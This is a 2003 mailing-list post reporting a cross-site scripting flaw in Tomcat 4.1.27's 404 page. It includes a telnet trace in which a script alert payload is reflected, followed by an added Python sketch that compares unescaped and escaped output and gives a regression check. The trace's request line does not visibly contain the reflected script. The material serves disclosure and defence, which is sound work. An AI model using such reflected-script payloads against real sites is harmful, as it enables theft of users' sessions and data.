Anyone know how serious this is?
It also appears to affect Tomcat 4.1.27 when using mod_jk as well. Below
is a sample trace of an HTTP session.
> telnet localhost 8080
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a666.jsp HTTP/1.0
HTTP/1.1 404 /666
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Apache Tomcat/4.1.27 - Error
HTTP Status 404 - /666
type Status report
The requested resource (/666
<script>alert("asdf");</script>666.jsp) is not
Tomcat/4.1.27
Connection closed by foreign host.
On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
> Kan Ogawa
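
Added example, not part of the original messages and not Tomcat's own code: a Python sketch of the behaviour visible in the trace above (the URL-decoded request path echoed into the 404 body) beside an HTML-escaped variant, plus a check that can be run over a response body as a regression test. The page wording, function names and the marker path are constructed for illustration.

```python
import html
from urllib.parse import unquote

# Constructed sample path: same shape as the request in the trace
# (encoded newlines in the path), carrying a harmless <b> marker.
SAMPLE_PATH = "/666%0a%0a%3Cb%3Emarker%3C/b%3E666.jsp"

PAGE = ("<html><body><h1>HTTP Status 404</h1>"
        "<p>Requested resource: {resource}</p></body></html>")


def render_404_unfiltered(raw_path: str) -> str:
    """Behaviour shown in the trace: the decoded path is echoed verbatim."""
    return PAGE.format(resource=unquote(raw_path))


def render_404_filtered(raw_path: str) -> str:
    """Hardened form: HTML-escape the decoded path before writing it out."""
    return PAGE.format(resource=html.escape(unquote(raw_path), quote=True))


def reflects_unescaped(raw_path: str, body: str) -> bool:
    """True if the body contains the decoded path with its markup intact.

    Paths without HTML-significant characters are ignored, since echoing
    them back is harmless.
    """
    decoded = unquote(raw_path)
    if not any(ch in decoded for ch in "<>\"'&"):
        return False
    return decoded in body


if __name__ == "__main__":
    for name, render in (("unfiltered", render_404_unfiltered),
                         ("filtered", render_404_filtered)):
        body = render(SAMPLE_PATH)
        print(name, "reflects markup:", reflects_unescaped(SAMPLE_PATH, body))
```

The same `reflects_unescaped` check can be pointed at the body of a real 404 response from a server under your own control after an upgrade or a custom error-page change.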